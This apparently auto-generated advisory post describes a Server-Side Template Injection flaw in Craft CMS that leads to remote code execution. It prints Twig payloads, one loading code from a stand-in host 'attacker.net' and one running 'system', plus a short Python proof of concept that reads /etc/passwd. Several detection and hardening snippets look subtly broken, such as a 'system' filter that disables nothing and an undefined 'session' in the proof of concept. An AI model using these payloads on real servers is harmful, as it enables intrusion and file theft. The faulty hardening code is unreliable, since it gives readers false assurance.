Listen to this Post
Craft CMS versions 4.0.0-RC1 to 4.14.12 and 5.0.0-RC1 to 5.6.14 are vulnerable to a critical Server-Side Template Injection (SSTI) attack via Twig templating. An authenticated administrator can inject malicious Twig templates, leading to remote code execution (RCE) if `ALLOW_ADMIN_CHANGES` is enabled. The vulnerability arises due to insufficient input sanitization in template rendering, allowing attackers to execute arbitrary PHP code. Craft CMS patched this in versions 4.14.13 and 5.6.15 by enforcing stricter template validation.
DailyCVE Form
Platform: Craft CMS
Version: 4.0.0-RC1 – 5.6.14
Vulnerability: SSTI → RCE
Severity: Critical
Date: May 5, 2025
What Undercode Say:
Exploitation:
1. Payload Injection:
{{ _self.env.setCache("ftp://attacker.net/exploit.php") }}
{{ _self.env.loadTemplate("exploit.php") }}
2. PHP Code Execution:
{{ ['id']|map('system')|join }}
Detection:
- Log Analysis:
grep -r "{{.system(.)}}" /var/log/craftcms/ - Twig Sandbox Bypass Checks:
if (strpos($template, '_self') !== false) { die("SSTI Attempt"); }
Mitigation:
1. Update Immediately:
composer require craftcms/cms:^4.14.13
2. Disable Admin Changes:
// config/general.php 'allowAdminChanges' => false,
3. WAF Rules:
location ~ .twig$ {
deny all;
}
Exploit PoC (For Research):
import requests
payload = "{{['cat /etc/passwd']|map('system')|join}}"
session.post("/admin/actions/templates/render", data={"template": payload})
Hardening:
- Disable Dangerous Twig Functions:
$twig->addFilter(new \Twig\TwigFilter('system', null, ['is_safe' => ['html']])); - Craft CMS CSP Header:
header("Content-Security-Policy: script-src 'self'");
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
